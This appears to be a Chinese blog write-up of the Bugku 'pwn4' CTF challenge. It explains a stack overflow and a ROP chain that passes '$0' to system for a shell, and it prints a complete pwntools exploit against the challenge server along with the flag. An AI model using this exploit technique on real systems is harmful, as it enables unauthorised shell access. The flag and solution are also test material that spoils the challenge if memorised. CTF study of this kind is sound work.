bugku pwn4 学习

最新推荐文章于 2024-04-27 17:57:02 发布
最新推荐文章于 2024-04-27 17:57:02 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: CTF python 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41079177/article/details/100106263
版权
CTF 同时被 3 个专栏收录
24 篇文章 5 订阅
订阅专栏
二进制
7 篇文章 0 订阅
订阅专栏
python
6 篇文章 0 订阅
订阅专栏

2019-08-25 bugku pwn4 学习

1.拿到题目先file 一下文件看看文件属性
bkp4-1.PNG

查看得知是64位动态链接库的文件。
2.checksec 查看是否开启什么保护
bkp4-2.PNG
然而并没有什么保护
PIE 保护指定是对代码段进行保护
3.IDA查看内容
bkp4-3.PNG

看到了敏感函数system,看着想办法跳转
4.查看main函数,有栈溢出的敏感函数 read
bkp4-4.PNG

想办法利用read 函数
5.查看read函数栈中内容
bkp4-5.PNG

完全能够进行溢出
6.由于system中没有’bin/sh’所以并不能直接跳转,这里找找巧看到了’$0’

bkp4-8.PNG

bkp4-6.PNGbkp4-7.PNG

因为在某些人的linux 中’$0’长长被用于bash的环境变量,也就是说:

system("$0")  == system('bin/sh')

所以我们可以构造system(“bin/sh”)来进行系统调用。但是由于我们只能调用一次所以我们可以使用rdi和ret 跳转进行
注意:32位利用栈传参,64位利用寄存器传参,rdi,rsi,rdx,rcx,r8,r9,六个寄存器进行传参,所以通过跳转 pop rdi;ret 来进行传参 最后传入system函数地址进行跳转
所以可以构建payload,地址一定需要找正确:

from pwn import *
ip = "114.116.54.89"
port = 10004
p=remote(ip,port)
#p = process("./pwn4")
def debug():
    gdb.attach(p)
    raw_input("debug")
elf = ELF("./pwn4")
context.log_level = 'debug'
pop_rdi = 0x00000000004007d3 
payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(0x60111f) +p64(elf.plt["system"])  
p.recv()
p.sendline(payload)
p.interactive()

执行命令:
bkp4-9.PNG

可以直接拿到flag:

flag{264bc50112318cd6e1a67b0724d6d3af}

?:这是题目的第一个解题方法,第二个方法可以使用 puts泄露libc函数地址,在libc中找到’bin/sh’的偏移量,就可以进行调用,这个方法由于栈只有0x10大小所以就放弃了,因为栈中读不进去。

神林丶
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
64位linux 系统调用,关于32位和64位linux的系统调用
weixin_34803466的博客
04-29 486
32位和64位的syscall原理都是一样只有传参和调用存在差异,以下一起说,做个对比32位系统调用使用 " int 80h "64位系统调用使用 " syscall " (汇编代码就是syscall 直接ROPgadget--only查找即可)32的系统调用号与64位的不大一样 使用的时候最好百度一下比如32位 #define __NR_execve 1164位 #define ...
[GFCTF 2021]where_is_shell
沈理大学牲的博客
11-13 437
在ROP攻击中,攻击者利用程序中存在的这种gadget,通过精心构造的数据将程序控制流引导到这个gadget,从而实现对程序行为的控制。通常情况下,攻击者会将需要的参数放置在栈上,然后利用ROP链将控制流引导到 "pop rdi;ret" 这样的gadget,将参数加载到合适的寄存器中,然后再执行调用目标函数的ret指令。在x86_64架构中,这个gadget的作用是从栈中弹出一个数值,并将其赋值给RDI寄存器,然后进行返回。先覆盖到地址,然后执行ret,ret用来返回弹出的地址,然后执行pop_rdi;
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2211
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)
最新发布
2301_79326813的博客
04-27 568
查看保护查看ida这里有一次栈溢出,并且题目给了我们system函数。这里的知识点没有那么复杂。
AWK学习笔记
jeffreyst的专栏
11-01 1200
AWK学习笔记 如下的内容来自《sed&awk》和自己的一些体会,如有不妥的地方,烦请指正,多谢~ 1.AWK是基于输入语句的,文件中有多少句子,AWK就会被调用多少次。 这个循环是AWK提供的,不用我们去实现。 2.awk的基本结构包括三部分 由于awk主要是处理输入的文件内容的,所以:   2.1执行前-->输入前执行的操作,有"BEGIN"标示,   2.2
Bugku pwn4
BengDouLove的博客
02-16 361
bugku pwn4 先ida打开elf文件,发现是64位,之前知道64位和32位有所不同但是还没有接触到过 程序里没什么,然后打开字符串子视图 有这么一句话,引起怀疑,然后双击点开,右键点开外部引用图表到 发现0x400751这个函数在调用这一段字符串,打开400751并且反汇编,发现是system函数,里面的参数正是这一段字符串,想到如果里面是系统指令就好了。 打开虚拟机,调试过程中也没有...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
system函数调用
dianmotang8246的博客
10-02 343
相关函数 fork,execve,waitpid,popen 表头文件 #include<stdlib.h> 定义函数 int system(const char * string); 函数说明 system()会调用fork()产生子进程,由子进程来调用/bin/sh-c string来执行参数string字符串所代表的命令,此命>令执行完后随即返回原调用的进程。在调...
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 343
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
awk中可以使用system来执行复杂的shell命令
热门推荐
imzoer的专栏
03-31 1万+
在awk中可以直接执行shell命令。 zoer@ubuntu:~$ touch a zoer@ubuntu:~$ touch b zoer@ubuntu:~$ cat a.txt a b zoer@ubuntu:~$ awk '{cmd="rm "$0;system(cmd)}' a.txt zoer@ubuntu:~$ ls a.txt dd import
HGAME 2017 or 2018 PWN levels
qq_42192672的博客
11-12 914
这个算是做之前的复现吧,感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下 流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖 这些变量都在一起,美滋滋 exp from pwn...
linux 系统信号忽略和system函数返回值问题(system的实现)
u014426028的博客
04-21 799
signal(SIGHUP, SIG_IGN); signal信号函数,第一个参数表示需要处理的信号值(SIGHUP),第二个参数为处理函数或者是一个表示,这里,SIG_IGN表示忽略SIGHUP那个注册的信号。 SIGHUP和控制台操作有关,当控制台被关闭时系统会向拥有控制台sessionID的所有进程发送HUP信号,默认HUP信号的action是 exit,如果远程登陆启动某个服务进程并在...
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1919
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4056
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
学习pwn需要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值